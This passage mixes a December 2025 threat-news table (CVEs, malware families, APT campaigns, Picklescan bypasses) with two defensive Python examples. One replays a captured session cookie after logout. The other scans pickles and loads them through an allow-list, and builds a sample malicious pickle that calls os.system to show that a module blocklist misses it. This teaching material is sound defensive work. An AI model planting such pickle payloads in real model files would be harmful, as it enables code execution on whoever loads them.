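    def user_for(self, cookie: str):
        user, _, mac = cookie.rpartition(":")
        expected = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
        return user if hmac.compare_digest(mac, expected) else None

    def logout(self, cookie: str) -> None:
        pass    # the server can only tell the browser to drop the cookie


class ServerSessions:
    """Cookie = opaque random token looked up in a server-side table. Logout deletes the
    row, so the very same cookie value maps to nothing afterwards."""

    def __init__(self) -> None:
        self._live: dict[str, str] = {}

    def issue(self, user: str) -> str:
        token = secrets.token_urlsafe(32)
        self._live[token] = user
        return token

    def user_for(self, cookie: str):
        return self._live.get(cookie)

    def logout(self, cookie: str) -> None:
        self._live.pop(cookie, None)


def replay_after_logout(store) -> bool:
    """Capture the cookie, let the user log out, replay the captured copy.
    True means the replay still authenticates, i.e. the store has the bug."""
    cookie = store.issue("alice")
    captured = cookie            # what an attacker sniffed or read from disk
    store.logout(cookie)
    return store.user_for(captured) == "alice"


if __name__ == "__main__":
    print("stateless cookie replays after logout:", replay_after_logout(StatelessCookie()))
    print("server session replays after logout:  ", replay_after_logout(ServerSessions()))
```

The same test doubles as a regression check for any web stack: log in, copy the cookie, log out, replay the copy, and expect a 401. ASP.NET Core's cookie authentication is stateless by default and only gains real revocation when a server-side ticket store is configured, which is why this check is worth running on that platform in particular.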
| 5.12.25 | Intellexa Leaks | Global: “Intellexa Leaks” investigation provides further evidence of spyware threats to human rights. | BIGBROTHER | BIGBROTHER |
| 5.12.25 | ValleyRAT | Silver Fox’s Russian Ruse: ValleyRAT Hits China via Fake Microsoft Teams Attack | MALWARE | RAT |
| 5.12.25 | BRICKSTORM Backdoor | The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Canadian Centre for Cyber Security (Cyber Centre) assess that People's Republic of China (PRC) state-sponsored cyber actors are using BRICKSTORM malware for long-term persistence on victim systems. | MALWARE | BACKDOOR |
| 4.12.25 | Cloudflare's 2025 Q3 DDoS threat report -- including Aisuru, the apex of botnets | Welcome to the 23rd edition of Cloudflare's Quarterly DDoS Threat Report. This report offers a comprehensive analysis of the evolving threat landscape of Distributed Denial of Service (DDoS) attacks based on data from the Cloudflare network. In this edition, we focus on the third quarter of 2025. | BOTNET | BOTNET |
| 4.12.25 | CVE-2025-55182 | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. | VULNERABILITY | |
| 4.12.25 | CVE-2025-9491 | Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. | VULNERABILITY | |
| 4.12.25 | CVE-2025-8489 | The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14. | VULNERABILITY | |
| 3.12.25 | ShadyPanda | 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign | APT | APT |
| 3.12.25 | CVE-2025-10155 | (CVSS score: 9.3/7.8) - A file extension bypass vulnerability that can be used to undermine the scanner and load the model when providing a standard pickle file with a PyTorch-related extension such as .bin or .pt. | VULNERABILITY | |
| 3.12.25 | CVE-2025-10156 | (CVSS score: 9.3/7.5) - A bypass vulnerability that can be used to disable ZIP archive scanning by introducing a Cyclic Redundancy Check (CRC) error. | VULNERABILITY | |
| 3.12.25 | CVE-2025-10157 | (CVSS score: 9.3/8.3) - A bypass vulnerability that can be used to undermine Picklescan's unsafe globals check, leading to arbitrary code execution by getting around a blocklist of dangerous imports. | VULNERABILITY | |
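The three Picklescan entries above are all consequences of scanning by convention (file extension, archive structure, a blocklist of module names) rather than by what the bytes will make the unpickler do. The following is an added example, not Picklescan's code, that scans a pickle stream for the globals it imports, shows why a module blocklist is brittle (the `os.system` reference the hostile payload embeds is recorded under the name of the module that actually defines it, `posix` on Linux CPython, not `os`), sniffs raw-pickle content independently of the file name, and finally loads through an allow-list `find_class` so anything unexpected is refused before it is resolved. The payloads and the zip header bytes are constructed; the hostile pickle is only ever fed to the restricted loader.

```python
import io
import os
import pickle
import pickletools


class Hostile:
    """Pickles to a call of os.system; never executed in this example."""

    def __reduce__(self):
        return (os.system, ("echo pwned",))


BENIGN_BYTES = pickle.dumps({"weights": [0.1, 0.2], "epoch": 3})     # constructed model state
HOSTILE_BYTES = pickle.dumps(Hostile())                               # constructed attacker payload
ZIP_HEADER = b"PK\x03\x04" + b"\x00" * 26                            # constructed: start of a zip container

_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "SHORT_BINSTRING", "BINSTRING"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Walk the opcode stream (no objects are built) and collect every (module, name)
    the unpickler would import. GLOBAL carries both names inline; STACK_GLOBAL takes
    them from the two most recent string pushes."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif op.name in _STRING_OPS:
            strings.append(arg)
    return found


BLOCKLIST = {"os", "subprocess", "builtins", "nt"}     # the brittle approach


def blocklist_flags(data: bytes) -> bool:
    """A module blocklist misses aliases: os.system's __module__ is 'posix' on Linux
    CPython, so the hostile payload passes this check untouched."""
    return any(module in BLOCKLIST for module, _ in referenced_globals(data))


def is_raw_pickle(data: bytes) -> bool:
    """Content sniffing instead of extension trust: protocol 2+ pickles (what ML tooling
    writes) open with the PROTO opcode 0x80 and end with STOP; a zip-based .pt does not."""
    if data[:1] != b"\x80":
        return False
    try:
        last = None
        for op, _arg, _pos in pickletools.genops(data):
            last = op.name
        return last == "STOP"
    except Exception:
        return False


ALLOWLIST = {("builtins", "dict"), ("builtins", "list"), ("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list instead of blocklist: any global not explicitly permitted is refused
    before it is imported, whatever module name the stream spells it under."""

    def find_class(self, module, name):
        if (module, name) in ALLOWLIST:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allow-listed")


def restricted_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print("hostile imports:", referenced_globals(HOSTILE_BYTES))
    print("blocklist catches hostile:", blocklist_flags(HOSTILE_BYTES))
    print("zip header looks like raw pickle:", is_raw_pickle(ZIP_HEADER))
    print("restricted load of benign:", restricted_load(BENIGN_BYTES))
```

The scanner and the restricted loader are complementary: the opcode walk is a cheap static gate for an upload pipeline, while the allow-list unpickler is the control that actually holds when a payload is crafted to look clean, because it fails closed on any name it has not been told about.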
| 3.12.25 | Glassworm's resurgence | Security can't take holidays off, but the code marketplace scanners just might. Over the past week, we've identified and tracked an unprecedented 23 extensions which copy other popular extensions, update after publishing with malware, manipulate download counts, and use KNOWN attack signatures which have been in use for months. Many of these relate to Glassworm malware, but there could be multiple campaigns at work as well. | MALWARE | WORM |
| 3.12.25 | MuddyWater | MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook | APT | APT |
| 2.12.25 | Android Security Bulletin—December 2025 | This Android Security Bulletin contains details of security vulnerabilities that affect Android devices. Security patch levels of 2025-12-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version. | VULNERABILITY | VULNERABILITY |
| 2.12.25 | Albiriox | Albiriox Exposed: A New RAT Mobile Malware Targeting Global Finance and Crypto Wallets | MALWARE | ANDROID |
| 2.12.25 | Tomiris | Tomiris wreaks Havoc: New tools and techniques of the APT group | APT | APT |
| 2.12.25 | CVE-2021-26829 | OpenPLC ScadaBR Cross-site Scripting Vulnerability: OpenPLC ScadaBR contains a cross-site scripting vulnerability via system_settings.shtm. | VULNERABILITY | |